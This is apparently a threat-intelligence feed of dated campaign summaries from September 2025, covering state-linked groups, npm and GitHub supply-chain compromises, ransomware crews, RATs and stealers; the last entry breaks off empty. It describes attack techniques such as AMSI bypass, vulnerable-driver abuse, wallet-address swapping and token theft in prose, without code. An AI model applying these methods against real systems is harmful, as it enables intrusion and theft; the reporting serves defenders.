Researchers from ANY.RUN have identified that North Korea’s Lazarus Group significantly expanded its operations in 2025, combining advanced social engineering tactics with supply-chain compromises to breach technology and cryptocurrency firms. By impersonating legitimate remote developers, the group gains insider access to corporate networks, exfiltrates sensitive data, and monetizes its access through fraud and extortion. In parallel, Lazarus is weaponizing open-source ecosystems, with over 230 backdoored GitHub and PyPI packages infiltrating more than 36,000 organizations, demonstrating their capability to scale attacks across software supply chains. The group employs three modular toolsets: InvisibleFerret for keylogging and command-and-control, OtterCookie for token and wallet theft, and PyLangGhost for full remote access, enabling credential harvesting, long-term espionage, and rapid lateral movement. Notable incidents include a $1.5 billion cryptocurrency theft from ByBit, initiated through a malicious Docker project that ultimately compromised AWS S3 resources. Techniques such as fake job interviews, trojanized Zoom installers, and deceptive "ClickFix" error pages are used to lower user defenses and evade detection.
Source: https://any.run/cybersecurity-blog/lazarus-group-attacks-2025/
2025-09-15
APT_C_24_Shortcut_Delivered_Obfuscated_Loader
MEDIUM
Intel Source:
360 Advanced Threat Research Institute
Intel Name:
APT_C_24_Shortcut_Delivered_Obfuscated_Loader
Date of Scan:
2025-09-15
Impact:
MEDIUM
Summary:
Researchers at 360 Advanced Threat Research Institute have observed the Sidewinder (APT-C-24) group distributing ZIP archives that contain Windows shortcut files to initiate a multilayer attack chain. The LNKs invoke a native scripting host to retrieve heavily obfuscated JScript from attacker infrastructure. This script decrypts and executes a C# payload directly in memory, giving the adversary remote control of the host without writing binaries to disk. The loader conducts environment checks for CPU, RAM and security processes to evade sandboxes and endpoint protection tools. After establishing persistence, it communicates with frequently changing command-and-control domains to receive follow-on modules. Sidewinder has shifted from earlier document-based exploits to this shortcut-only delivery, increasing execution success on fully patched systems. Targeting remains centred on government, defence and energy organisations in South Asian countries, suggesting a strategic intelligence-collection motive.
Source: https://www.ctfiot.com/270213.html
2025-09-15
D4RK_4RMY_Aug_2025_Financial_Sector_Attacks
MEDIUM
Intel Source:
ASEC
Intel Name:
D4RK_4RMY_Aug_2025_Financial_Sector_Attacks
Date of Scan:
2025-09-15
Impact:
MEDIUM
Summary:
Researchers at AhnLab have observed multiple financially-motivated and hacktivist actors mounting high-impact operations against Asian and Middle-East banking entities in August 2025. The ransomware group D4RK 4RMY claims to have encrypted systems and exfiltrated 845 GB of data from a Japanese financial holding company, signalling combined disruption-and-extortion intent. Separately, actor chase461 advertised a 90 GB offshore-corporate registry leak from a Hong Kong fund-services division, exposing identification documents and financial statements. In Iraq, hacktivist collective Keymous publicised distributed-denial-of-service campaigns against three major domestic banks to advance an ideological “Hack for Humanity” agenda. Collectively, these incidents reveal intent to monetise stolen data, apply pressure through service disruption, and promote political messaging. Observed capabilities include large-scale data exfiltration, bespoke ransomware deployment, and coordinated DDoS activity.
Source: https://asec.ahnlab.com/en/90110/
2025-09-14
Unknown_Actor_NPM_Crypto_Heist
HIGH
Intel Source:
Checkpoint
Intel Name:
Unknown_Actor_NPM_Crypto_Heist
Date of Scan:
2025-09-14
Impact:
HIGH
Summary:
Researchers at Check Point Research have identified a phishing-enabled supply-chain attack in which an unknown threat actor hijacked the npm account of maintainer Josh “Qix-” Junon and pushed weaponised updates to at least 18 foundational JavaScript packages. The trojanised releases embed heavily obfuscated browser code that hooks fetch, XMLHttpRequest, and window.ethereum at runtime, enabling transparent rewrites of cryptocurrency wallet addresses and transaction parameters to divert funds to attacker-controlled destinations. The affected libraries collectively receive more than two billion weekly downloads, granting the campaign extraordinary reach across open-source and enterprise codebases.
Source: https://blog.checkpoint.com/crypto/the-great-npm-heist-september-2025/
2025-09-14
PoisonSeed_Targets_Enterprises_with_Phishing_Scam
MEDIUM
Intel Source:
DTI
Intel Name:
PoisonSeed_Targets_Enterprises_with_Phishing_Scam
Date of Scan:
2025-09-14
Impact:
MEDIUM
Summary:
Researchers at DomainTools have found that the e-crime actor PoisonSeed registered 21 new domains after June 1, 2025, impersonating SendGrid and related login services in a credential-harvesting campaign. These domains redirect victims through fake Cloudflare CAPTCHA pages to add legitimacy to the phishing flow. PoisonSeed is using bespoke domain infrastructure, spoofed web content, and hosting on ASN 42624 (Global-Data System IT Corp) to enable rapid credential collection and reuse in subsequent attacks. The group’s tactics, particularly the CAPTCHA ruse and choice of registrar and ASN, closely resemble those used by SCATTERED SPIDER, suggesting possible shared tooling or personnel. While no specific victims are currently named, PoisonSeed has previously targeted cryptocurrency platforms and enterprise environments, indicating a broad attack surface. Successful compromise could result in lateral movement, data theft, cryptocurrency exfiltration, and extortion, posing significant operational and financial risks to affected organizations.
Source: https://dti.domaintools.com/newly-identified-domains-likely-linked-to-continued-activity-from-poisonseed-e-crime-actor/
2025-09-13
Attackers_Exploit_Axios_for_Automated_Phishing_Attacks
MEDIUM
Intel Source:
Reliaquest
Intel Name:
Attackers_Exploit_Axios_for_Automated_Phishing_Attacks
Date of Scan:
2025-09-13
Impact:
MEDIUM
Summary:
ReliaQuest researchers have identified a new phishing technique where attackers abuse the JavaScript HTTP client Axios as a fake user-agent to automate credential phishing workflows. These campaigns rely on Microsoft Direct Send for delivery and use Axios-scripted HTTP requests to steal credentials, bypass MFA, and manipulate APIs. Once victims enter their details, attackers can steal session tokens to replay Azure authentication flows, effectively bypassing MFA and gaining access to sensitive APIs. Early attacks focused on executives in finance, healthcare, and manufacturing but the campaign has since expanded to general users, showing its scalability. To avoid detection, phishing emails often embed QR codes that redirect through disposable .es domains and Firebase links.
Source: https://reliaquest.com/blog/threat-spotlight-attackers-exploit-axios-for-automated-phishing/
2025-09-13
CyberVolk_Dual_Encryption_and_Fake_Decryption_Technique
HIGH
Intel Source:
ASEC
Intel Name:
CyberVolk_Dual_Encryption_and_Fake_Decryption_Technique
Date of Scan:
2025-09-13
Impact:
HIGH
Summary:
Researchers at ASEC have observed a ransomware group called CyberVolk, which first emerged in May 2024, leveraging its own custom-built ransomware payload, which renders files permanently unrecoverable by applying double encryption with AES-256-GCM and ChaCha20-Poly1305 and offers a deceptive decryption routine that permanently denies data recovery. The malware restarts itself with administrator rights to gain maximum access to files, while avoiding critical system directories to ensure the operating system remains functional. So far, CyberVolk has targeted government bodies, critical infrastructure, and scientific institutions in Japan, France, and the UK. The ransom demands payment in Bitcoin and offers only a single communication channel, reflecting a streamlined extortion model. Although there is no evidence of spreading across networks or data exfiltration, the campaign demonstrates a clear focus on host-level disruption.
Source: https://asec.ahnlab.com/ko/90033/
2025-09-13
New_Buterat_Backdoor_Malware
MEDIUM
Intel Source:
PointWild
Intel Name:
New_Buterat_Backdoor_Malware
Date of Scan:
2025-09-13
Impact:
MEDIUM
Summary:
PointWild researchers have identified a new Windows-based backdoor dubbed Buterat, designed to provide attackers with long-term and covert access to compromised systems. The malware establishes encrypted C2 communications, executes arbitrary commands, harvests credentials, exfiltrates data, and deploys additional DLL or EXE payloads. It employs obfuscated strings and API-level thread injection to evade detection, while masquerading as legitimate processes and maintaining persistence through registry modifications. Initial access has been observed via phishing campaigns and trojanized downloads, with targets spanning both enterprise and government networks. Although no destructive functionality has been reported, Buterat’s capabilities make it well-suited for ransomware, espionage, or extortion operations.
Source: https://www.pointwild.com/threat-intelligence/analysis-of-backdoor-win32-buterat
2025-09-13
ChillyHell_macOS_Backdoor
HIGH
Intel Source:
Jamf
Intel Name:
ChillyHell_macOS_Backdoor
Date of Scan:
2025-09-13
Impact:
HIGH
Summary:
Researchers from Jamf have uncovered ChillyHell, a developer-signed and Apple-notarized C++ backdoor that has been covertly targeting macOS systems since at least 2021. The malware is modular and highly capable, allowing attackers to execute remote commands, steal files, harvest credentials, and even perform brute-force password attacks. ChillyHell establishes persistence through user-level LaunchAgents, root-level LaunchDaemons and shell profile injection, and it manipulates file timestamps to evade detection. Its C2 operations leverage both HTTPS and DNS TXT records, constantly checking for new commands to execute. Notably, the malware has been used in targeted campaigns against Ukrainian government officials, indicating a focus on high-value geopolitical intelligence. If successfully deployed, ChillyHell enables long-term surveillance, credential theft, and lateral movement within macOS environments.
Source: https://www.jamf.com/blog/chillyhell-a-modular-macos-backdoor/
2025-09-13
kkRAT_Crypto_Stealing_RAT_Uses_BYOVD
MEDIUM
Intel Source:
Zscaler
Intel Name:
kkRAT_Crypto_Stealing_RAT_Uses_BYOVD
Date of Scan:
2025-09-13
Impact:
MEDIUM
Summary:
Researchers at Zscaler ThreatLabz have observed a multi-stage malware campaign that deploys kkRAT together with ValleyRAT and FatalRAT. The operation begins with fake software installers that deliver shellcode stages culminating in a vulnerable-driver technique to disable local security products and sideload the RAT. Once resident, kkRAT registers with its command-and-control server, transmitting detailed host fingerprinting data and loading an encrypted plugin framework. Available commands provide remote desktop control, interactive shell execution, process and network enumeration, SOCKS5 proxy tunnelling and clipboard manipulation that swaps cryptocurrency wallet addresses. Persistence options include scheduled tasks, registry Run keys, startup shortcuts and logon scripts.
Source: https://www.zscaler.com/blogs/security-research/technical-analysis-kkrat
2025-09-12
Malware_Campaign_Drop_XWorm_and_Remcos_RAT
HIGH
Intel Source:
Seqrite
Intel Name:
Malware_Campaign_Drop_XWorm_and_Remcos_RAT
Date of Scan:
2025-09-12
Impact:
HIGH
Summary:
Seqrite researchers have uncovered a phishing campaign that delivers XWorm and Remcos RAT through ZIP and SVG attachments containing obfuscated BAT scripts. The attack begins with a BAT script that establishes persistence in the Windows Startup folder and launches a PowerShell stager that disables AMSI and ETW and executes payloads entirely in memory to evade detection. The attack uses multiple loader stages to decrypt and execute .NET assemblies that deploy XWorm or Remcos RATs, enabling remote command execution, keylogging, credential theft, and data exfiltration. The attackers also abuse CDNs such as ImageKit to host intermediate payloads. The campaign appears opportunistic, targeting any vulnerable Windows endpoints, and successful compromise can give attackers administrative control and enable lateral movement across networks.
Source: https://www.seqrite.com/blog/xworm-remcos-bat-svg-malware-analysis/
2025-09-12
BlackNevas_Double_Extortion_Ransomware
MEDIUM
Intel Source:
ASEC
Intel Name:
BlackNevas_Double_Extortion_Ransomware
Date of Scan:
2025-09-12
Impact:
MEDIUM
Summary:
Researchers at AhnLab ASEC have observed the BlackNevas ransomware group conducting coordinated double-extortion attacks against organizations worldwide. The actors deploy a bespoke Windows payload that encrypts files with AES and safeguards the session key with embedded RSA, sharply limiting prospects for key recovery. Campaign telemetry shows victims across multiple industries, including critical infrastructure operators, with a concentration in the Asia-Pacific region and additional incidents in Europe and North America. BlackNevas is operated as a closed crew rather than a public affiliate program, allowing the same team to manage intrusion, exfiltration, encryption and negotiation phases. The binary accepts runtime switches such as /fast, /stealth and /shdwn that let operators calibrate speed, visibility and end-state impact. Default behaviour encrypts only a portion of each file and purposefully skips core system paths to preserve host stability and maximise leverage.
Source: https://asec.ahnlab.com/en/90080/
2025-09-12
Karuizawa_Malware
HIGH
Intel Source:
Akamai
Intel Name:
Karuizawa_Malware
Date of Scan:
2025-09-12
Impact:
HIGH
Summary:
Akamai researchers have identified a new Docker-targeting malware strain called Karuizawa, which exploits unauthenticated Docker Engine APIs to gain root-level access by mounting the host file system. Once inside, it uses a Tor-delivered script to establish persistence via SSH, restrict access to the Docker API, and deploy additional tools. These include masscan for scanning other vulnerable hosts and a custom Go-based dropper that profiles active users, spreads the infection, and triggers additional payloads. Unlike earlier versions that primarily focused on cryptocurrency mining, this variant is designed to build a botnet, extending its reach by exploiting Telnet and Chrome debugging ports. It can steal credentials, exfiltrate cookies, and abuse hijacked browsers to generate distributed DDoS traffic through Chromedp automation.
Source: https://www.akamai.com/blog/security-research/new-malware-targeting-docker-apis-akamai-hunt
2025-09-12
CVE_2025_31324_SAP_NetWeaver_RCE
HIGH
Intel Source:
Seqrite
Intel Name:
CVE_2025_31324_SAP_NetWeaver_RCE
Date of Scan:
2025-09-12
Impact:
HIGH
Summary:
Researchers at Seqrite have observed a surge in exploitation of CVE-2025-31324, an unauthenticated file-upload flaw in SAP NetWeaver Development Server that enables remote code execution. Attackers are leveraging the weakness to implant web shells and custom backdoors, obtaining full control of vulnerable servers. With this foothold, they pivot laterally, harvest credentials and exfiltrate sensitive business data. Confirmed incidents involve manufacturing, retail and telecom enterprises, where disruptions to SAP-driven workflows were reported. Public release of an exploit tool in August 2025 accelerated mass scanning and automated compromise activity.
Source: https://www.seqrite.com/blog/cve-2025-31324-sap-vulnerability-protection/
2025-09-11
AsyncRAT_Fileless_RAT_via_ScreenConnect
MEDIUM
Intel Source:
LevelBlue
Intel Name:
AsyncRAT_Fileless_RAT_via_ScreenConnect
Date of Scan:
2025-09-11
Impact:
MEDIUM
Summary:
Researchers at LevelBlue have identified attackers abusing a trojanized ScreenConnect installer to deliver an in-memory variant of AsyncRAT, enabling covert credential and crypto-wallet theft on Windows hosts. The multilayer VBScript-PowerShell loader disables AMSI and ETW telemetry, then registers a fake “Skype Updater” scheduled task so the RAT survives reboots without leaving an executable on disk. Once active, AsyncRAT maintains TLS-encrypted command-and-control, fingerprints the host, and exfiltrates browser passwords, key-logs, clipboard data, and wallet files. Operators can remotely push plug-ins that kill security processes or run arbitrary commands, providing durable control. The tooling requires only local-administrator privileges and leverages legitimate remote-support software, complicating detection.
Source: https://cyber.levelblue.com/m/5542a17fd05a0c46/original/TTR-Spotlight-AsyncRAT-in-Action.pdf
2025-09-10
Patchwork_DarkSamural_false_flag_Mythic_RAT
MEDIUM
Intel Source:
TahirSec
Intel Name:
Patchwork_DarkSamural_false_flag_Mythic_RAT
Date of Scan:
2025-09-10
Impact:
MEDIUM
Summary:
Researchers at TahirSec have identified the India-nexus APT Patchwork masquerading as the Vietnam-linked “Dark Samural” subgroup of OceanLotus to divert attribution. The campaign begins with spear-phishing emails carrying .msc files that abuse GrimResource to execute multilayer-obfuscated JavaScript and retrieve payloads. Once triggered, the scripts sideload a weaponised DLL to establish a Mythic remote-access agent that communicates over HTTPS with cloud-hosted C2 infrastructure using AES-GCM encryption. The malware creates scheduled tasks for persistence, employs white-plus-black DLL chaining for defence evasion, and steals browser master keys to exfiltrate credentials and other sensitive data. Historical patterns show Patchwork prioritising military, diplomatic, education and research entities, and this wave currently focuses on Pakistan. The toolset includes both proprietary (BADNEWS) and open-source (AsyncRAT, QuasarRAT, Mythic) implants, underscoring a flexible but proven capability set.
Source: https://www.ctfiot.com/269659.html
2025-09-10
Multi_Affiliate_TA_Ransomware_Prep_via_SectopRAT
HIGH
Intel Source:
The DFIR Report
Intel Name:
Multi_Affiliate_TA_Ransomware_Prep_via_SectopRAT
Date of Scan:
2025-09-10
Impact:
HIGH
Summary:
Researchers at The DFIR Report have observed a multi-affiliate threat actor leveraging a trojanized desktop-utility installer to gain an initial foothold, deploying a remote-access trojan and proxy malware. The operator swiftly created a local administrator account, established persistence, and pivoted via RDP from the initial host to the domain controller, backup server, and file servers. They harvested credentials through Veeam database dumping, directory-replication abuse, and memory-scraping techniques. Detailed network and Active Directory reconnaissance was carried out with a mix of open-source tools and custom binaries. Sensitive file-share data was archived and exfiltrated over plain-text FTP to external cloud infrastructure. Infrastructure and tooling overlap links the intrusion to the Play, RansomHub, and DragonForce ransomware ecosystems, indicating an affiliate experienced across multiple RaaS programmes.
Source: https://thedfirreport.com/2025/09/08/blurring-the-lines-intrusion-shows-connection-with-three-major-ransomware-gangs/
2025-09-10
Unknown_Actor_Hijacks_NPM_Packages_to_Steal_Crypto_Funds
MEDIUM
Intel Source:
Aikido
Intel Name:
Unknown_Actor_Hijacks_NPM_Packages_to_Steal_Crypto_Funds
Date of Scan:
2025-09-10
Impact:
MEDIUM
Summary:
Researchers at Aikido have discovered that an unidentified actor hijacked the maintainer accounts of 18 highly popular npm packages, including chalk and debug. The attacker uploaded new, trojanized versions that embed heavily obfuscated JavaScript. Once a tainted library is loaded in a browser-based web application, the code hooks fetch, XMLHttpRequest, and several wallet APIs to monitor outbound blockchain transactions. When it detects cryptocurrency transfers, it transparently rewrites destination addresses to those controlled by the threat actor, diverting funds without user awareness. The implant further alters on-screen text to display look-alike wallet strings, masking the fraud from manual review. Collectively, the compromised packages receive more than two billion weekly downloads, giving the campaign extraordinary reach and the potential for silent, large-scale financial loss.
Source: https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised
2025-09-10
The_Gentlemen_Enterprise_Wide_Double_Extortion
HIGH
Intel Source:
Trend Micro
Intel Name:
The_Gentlemen_Enterprise_Wide_Double_Extortion
Date of Scan:
2025-09-10
Impact:
HIGH
Summary:
Researchers at Trend Micro have identified a previously undocumented ransomware crew dubbed “The Gentlemen,” first observed in August 2025. The group rapidly attained domain-administrator control in multiple victim environments and pushed a custom, password-protected ransomware payload through the NETLOGON share to encrypt every Windows host. Operators paired the encryption phase with bulk theft of internal data over encrypted WinSCP tunnels, enabling a double extortion model that pressures organisations to pay. They exhibited strong intent and capability by abusing a signed, vulnerable driver to kill security agents, tailoring successive anti-AV binaries to each endpoint stack encountered, and manipulating Group Policy Objects for domain-wide persistence. Lateral movement relied on PsExec, AnyDesk and compromised FortiGate VPN credentials, demonstrating fluid use of both living-off-the-land tools and bespoke malware.
Source: https://www.trendmicro.com/en_us/research/25/i/unmasking-the-gentlemen-ransomware.html
2025-09-09
Weaponized_SVGs_Target_Colombia_with_Phishing
MEDIUM
Intel Source:
Virustotal
Intel Name:
Weaponized_SVGs_Target_Colombia_with_Phishing
Date of Scan:
2025-09-09
Impact:
MEDIUM
Summary:
Researchers at VirusTotal have uncovered an email-borne campaign in which unknown actors distribute weaponized SVG attachments that mimic a Colombian judicial-system portal and covertly deliver a malicious ZIP payload. All 44 discovered samples initially evaded every antivirus engine on VirusTotal, with the SVGs executing obfuscated JavaScript that decodes a Base64-encoded phishing page to trick victims and extracts another Base64 string to automatically download the malware archive. To bypass detection, the attackers use polymorphism, large dummy code blocks, and Spanish-language comments such as “POLIFORMISMO_MASIVO_SEGURO” and “Funciones dummy MASIVAS.” The first known sample appeared in Colombia on 14 August 2025, and file sizes have since decreased, suggesting payload optimization. Victimology indicates a focus on Colombian organisations and citizens, exploiting trust in Fiscalía General de la Nación branding. With its combination of realistic phishing lures, automated malware delivery, and sophisticated obfuscation, the campaign poses a credible risk of initial access, enabling credential theft, secondary payload staging, and broader compromise.
Source: https://blog.virustotal.com/2025/09/uncovering-colombian-malware-campaign.html
2025-09-09
Multiple_Ransomware_Groups_2025_Attacks_on_Healthcare
HIGH
Intel Source:
Polyswarm
Intel Name:
Multiple_Ransomware_Groups_2025_Attacks_on_Healthcare
Date of Scan:
2025-09-09
Impact:
HIGH
Summary:
Researchers at PolySwarm have observed a coordinated surge of ransomware activity against the global healthcare sector during 2025. Threat actors including INC, Akira, Qilin, INTERLOCK, Rhysida and several others leveraged phishing emails, unpatched systems and supply-chain footholds to secure initial access. Post-compromise toolsets such as Cobalt Strike beacons, Mimikatz credential dumps and Rclone data movers enabled persistence, privilege escalation and large-scale exfiltration before files were encrypted. Victim organisations faced double-extortion ransom notes demanding multi-million-dollar Bitcoin payments under the threat of public leaks of stolen patient data. At least 50 confirmed incidents in the United States alone exposed more than 3.2 million personal health records, while parallel intrusions in Europe and Asia forced ambulance diversions, cancelled surgeries and, in one UK hospital, contributed to a patient fatality.
Source: https://blog.polyswarm.io/recent-ransomware-threats-to-the-healthcare-vertical?utm_campaign=Hivemind%20Reporting&utm_medium=email&_hsmi=379568764&utm_content=379568764&utm_source=hs_email
2025-09-09
Malicious_NPM_Package_Targets_Crypto_Users
MEDIUM
Intel Source:
Socket
Intel Name:
Malicious_NPM_Package_Targets_Crypto_Users
Date of Scan:
2025-09-09
Impact:
MEDIUM
Summary:
Researchers from Socket have identified a malicious npm package masquerading as the Nodemailer library. Once installed, the package leverages Electron tools to secretly unpack and manipulate Atomic and Exodus cryptocurrency wallets on Windows. It injects hidden JavaScript code that redirects outgoing crypto transactions to attacker-controlled wallets. The attacker’s npm account is newly created, and package downloads remain limited, indicating the campaign is still in its early stages. However, because it spreads through a supply-chain vector, the threat has the potential to impact many users. The malware persists until victims reinstall their wallets from official sources, and successful attacks result in the immediate theft of cryptocurrency.
Source: https://socket.dev/blog/wallet-draining-npm-package-impersonates-nodemailer?utm_medium=feed
2025-09-09
Alviva_Infrastructure_Linked_to_Cybercrime_Groups
HIGH
Intel Source:
The Raven File
Intel Name:
Alviva_Infrastructure_Linked_to_Cybercrime_Groups
Date of Scan:
2025-09-09
Impact:
HIGH
Summary:
Researchers at the Raven File have identified that infrastructure owned by Alviva Holding Ltd is being consistently leveraged by high-profile cybercriminal groups, particularly the Clop ransomware gang. Recent analysis of newly registered Clop contact domains shows they resolve to IP addresses within autonomous systems (AS209132 and AS209272) registered to Alviva. Historical abuse data links these ASNs to malicious activity such as Cobalt Strike beacons, malware distribution, and DDoS services spanning more than a decade. Corporate records list Alviva’s headquarters at a Seychelles address also used by multiple shell companies named in the Pandora Papers and connected to the now-blacklisted Alpha Consulting network. Beneficial ownership tracing points to Russian national Denis Nachaev, indicating efforts to obscure true control and financial operations. Alviva’s infrastructure—featuring stable IP allocations, permissive abuse handling, and peering with other bulletproof hosting providers—offers ransomware operators dependable command-and-control channels, victim communication platforms, and data-leak hosting.
Source: https://theravenfile.com/2025/09/08/uncovering-alviva-holding-links-to-russian-shell-companies-and-cybercrime/
2025-09-08
APT37_Target_Windows_via_Rust_Backdoor_and_Python_Loader
MEDIUM
Intel Source:
Zscaler
Intel Name:
APT37_Target_Windows_via_Rust_Backdoor_and_Python_Loader
Date of Scan:
2025-09-08
Impact:
MEDIUM
Summary:
Zscaler researchers have uncovered a new cyber-espionage campaign conducted by APT37, a North Korea-linked threat group active since at least 2012. The group leverages a custom Rust-based backdoor called Rustonott, delivered through a Python loader and controlled via a single C2 server. The malware is designed to provide attackers long-term, covert access to Windows systems, with capabilities including file theft, keylogging, screen and audio recording, registry changes, and scheduled task creation. Victims identified in this campaign are primarily individuals in South Korea involved in political and diplomatic affairs related to North Korea, showing the campaign’s focus on intelligence gathering. The infrastructure enables real-time surveillance and data collection, further emphasizing the actor’s focus on espionage rather than disruption.
Source: https://www.zscaler.com/blogs/security-research/apt37-targets-windows-rust-backdoor-and-python-loader
2025-09-08
The_GhostAction_Campaign
MEDIUM
Intel Source:
GitGuardian
Intel Name:
The_GhostAction_Campaign
Date of Scan:
2025-09-08
Impact:
MEDIUM
Summary:
GitGuardian researchers have uncovered GhostAction, a large-scale supply chain campaign that exploits GitHub Actions workflows to steal developer credentials. The threat actors injected malicious YAML files into 327 GitHub accounts across 817 repositories, leading to the exfiltration of more than 3,300 tokens associated with PyPI, npm, DockerHub, AWS, and various databases during automated CI runs. These stolen credentials enable attackers to publish backdoored packages, escalate privileges within cloud environments, and move laterally into production systems. The identical malicious payloads spread across projects in Python, Rust, JavaScript, and Go, highlighting the campaign’s broad impact on the software ecosystem.
Source: https://blog.gitguardian.com/ghostaction-campaign-3-325-secrets-stolen/
2025-09-08
SafePay_Ransomware
HIGH
Intel Source:
Bitdefender
Intel Name:
SafePay_Ransomware
Date of Scan:
2025-09-08
Impact:
HIGH
Summary:
Bitdefender has identified a new ransomware strain dubbed SafePay, which has impacted over 270 organizations since its emergence in late 2024. The group is notable for its speed, often moving from initial access to full encryption and public victim disclosure within 24 hours. SafePay operators gain initial access through stolen or brute-forced credentials, VPN attacks, or social engineering that impersonates IT staff. Once inside, they leverage tools such as ShareFinder for network discovery, PsExec for lateral movement, and WinRAR and FileZilla for data exfiltration. The ransomware employs ChaCha20 encryption, appends the .safepay extension, deletes shadow copies, and drops a ransom note named readme_safepay.txt. Victims have been observed in the United States, Germany, the United Kingdom, and Canada, with manufacturing, healthcare, and construction sectors most affected. Ransom demands are tailored to organizational revenue and can reach tens of millions of dollars.
Source: https://www.bitdefender.com/en-us/blog/businessinsights/safepay-ransomware-attacks-ttps
2025-09-08
GPUGate_Malware_GPU_Gated_Malvertising_Campaign
HIGH
Intel Source:
Arcticwolf
Intel Name:
GPUGate_Malware_GPU_Gated_Malvertising_Campaign
Date of Scan:
2025-09-08
Impact:
HIGH
Summary:
Researchers at Arctic Wolf have observed a Russian-speaking threat actor distributing a trojanized GitHub Desktop installer, dubbed GPUGate, through malicious Google Ads that redirect victims to look-alike download portals. The oversized 128 MB MSI is padded with legitimate binaries to evade sandbox size checks and embeds a .NET loader that decrypts its payload only when it detects a discrete GPU whose device name exceeds ten characters, defeating most virtual analysis environments. Upon execution, the installer requests a single UAC prompt, implants itself under %APPDATA%, disables Microsoft Defender scanning for its directory, and schedules a high-privilege task for persistence. A follow-on PowerShell script retrieves stage-two ZIP archives that enable DLL sideloading and can deploy additional payloads, including the AMOS information-stealer on macOS hosts. Campaign telemetry highlights selective targeting of Western European IT professionals, particularly software developers, implying an initial-access objective focused on credential theft and potential supply-chain compromise.
Source: https://arcticwolf.com/resources/blog/gpugate-malware-malicious-github-desktop-implants-use-hardware-specific-decryption-abuse-google-ads-target-western-europe/
2025-09-07
NoisyBear_Phishing_Hits_Kazakhstan_Oil_and_Gas
HIGH
Intel Source:
Seqrite
Intel Name:
NoisyBear_Phishing_Hits_Kazakhstan_Oil_and_Gas
Date of Scan:
2025-09-07
Impact:
HIGH
Summary:
Researchers at Seqrite Labs have identified a spear-phishing campaign, codenamed Operation BarrelFire, that delivers multi-stage payloads to employees of Kazakhstan’s national oil firm, KazMunaiGas. The NoisyBear actor uses a compromised business email to send ZIP archives containing a decoy salary document and a malicious LNK shortcut. When executed, the chain downloads batch scripts and custom PowerShell loaders (“DOWNSHELL”) that disable AMSI scanning and inject a Meterpreter reverse shell into explorer.exe. Subsequent reflective DLL loading hijacks a suspended rundll32.exe thread to maintain control.
Source: https://www.seqrite.com/blog/operation-barrelfire-noisybear-kazakhstan-oil-gas-sector/
2025-09-07
Sitecore_CVE_2025_53690_Exploitation_Campaign
HIGH
Intel Source:
Google Cloud (Mandiant)
Intel Name:
Sitecore_CVE_2025_53690_Exploitation_Campaign
Date of Scan:
2025-09-07
Impact:
HIGH
Summary:
Researchers at Mandiant have identified an active exploitation campaign targeting Sitecore deployments vulnerable to CVE-2025-53690, a ViewState deserialization zero-day. Attackers leveraged an exposed ASP.NET machine key, published in older Sitecore deployment guides, to achieve remote code execution on internet-facing instances. Following compromise, they deployed WEEPSTEEL, a reconnaissance malware masquerading as a benign ViewState payload, to extract host and network data. The adversary then escalated privileges by creating local administrator accounts and deployed tools including DWAGENT and EARTHWORM to enable persistence, tunneling, and command-and-control. Credential dumping via SYSTEM and SAM hives, token theft attempts using GoTokenTheft, and Active Directory reconnaissance with SHARPHOUND were observed, alongside lateral movement through RDP sessions.
Source: https://cloud.google.com/blog/topics/threat-intelligence/viewstate-deserialization-zero-day-vulnerability
2025-09-07
Salat_Stealer
HIGH
Intel Source:
Cyfirma
Intel Name:
Salat_Stealer
Date of Scan:
2025-09-07
Impact:
HIGH
Summary:
Cyfirma researchers have uncovered a new Windows malware called Salat Stealer, developed and operated by Russian-speaking cybercriminals. This malware is designed to steal browser passwords, cryptocurrency wallet data, and session tokens on a large scale. It leverages JavaScript and a packed loader to deploy a malicious DLL that communicates with its operators over encrypted HTTPS and WebSocket channels. Once inside a system, it establishes persistence by modifying registry settings and scheduling tasks, while also disabling Windows Defender and recovery options to make removal harder. The stolen data is encrypted and sent to servers controlled by the attackers. Access to this stolen information is sold through a web panel called “NyashTeam,” part of a growing malware-as-a-service (MaaS) operation. If undetected, Salat Stealer can lead to stolen credentials, account takeovers, cryptocurrency theft, business email compromise, and deeper intrusions inside corporate networks.
Source: https://www.cyfirma.com/research/unmasked-salat-stealer-a-deep-dive-into-its-advanced-persistence-mechanisms-and-c2-infrastructure/
2025-09-07
Malicious_npm_Packages_Blockchain_Based_Loader
MEDIUM
Intel Source:
Reversing Labs
Intel Name:
Malicious_npm_Packages_Blockchain_Based_Loader
Date of Scan:
2025-09-07
Impact:
MEDIUM
Summary:
Researchers at ReversingLabs have observed a software-supply-chain campaign that weaponises two JavaScript utility packages to surreptitiously install downloader malware via Ethereum smart contracts. The actor embeds an obfuscated Node.js script that queries a public contract to retrieve a command-and-control (C2) URL, then executes system commands to pull a second-stage payload. By hosting C2 data on the blockchain—traffic that blends with legitimate crypto activity—the threat significantly impedes traditional URL or domain-based detections. GitHub repositories masquerading as popular cryptocurrency trading bots amplify distribution through fabricated stars, forks and automated commit inflation, luring developers into adding the tainted dependencies.
Source: https://www.reversinglabs.com/blog/ethereum-contracts-malicious-code
2025-09-07
Attackers_Abuse_AWS_SES_for_Phishing_Campaign
MEDIUM
Intel Source:
Wiz
Intel Name:
Attackers_Abuse_AWS_SES_for_Phishing_Campaign
Date of Scan:
2025-09-07
Impact:
MEDIUM
Summary:
Wiz researchers have uncovered a phishing campaign where attackers exploit stolen AWS access keys to compromise the victim’s Simple Email Service (SES) environment. The attack begins when a previously inactive IAM key is suddenly activated from an unusual network, indicating credential compromise. The attackers then quickly bypass SES’s default sandbox restrictions by upgrading the account to production mode, enabling them to send up to 50,000 emails per day. They proceed to register new domains, create generic email addresses, and distribute phishing emails disguised as 2024 tax documents that redirect recipients to credential-stealing websites. The operation runs entirely within AWS, where attackers blend malicious activity with legitimate cloud traffic, making detection difficult. The result is large-scale credential theft, potential business email compromise, and service disruptions for the affected victim.
Source: https://www.wiz.io/blog/wiz-discovers-cloud-email-abuse-campaign
2025-09-06
Kimsuky_Dropbox_Enabled_PowerShell_Espionage
MEDIUM
Intel Source:
ESET
Intel Name:
Kimsuky_Dropbox_Enabled_PowerShell_Espionage
Date of Scan:
2025-09-06
Impact:
MEDIUM
Summary:
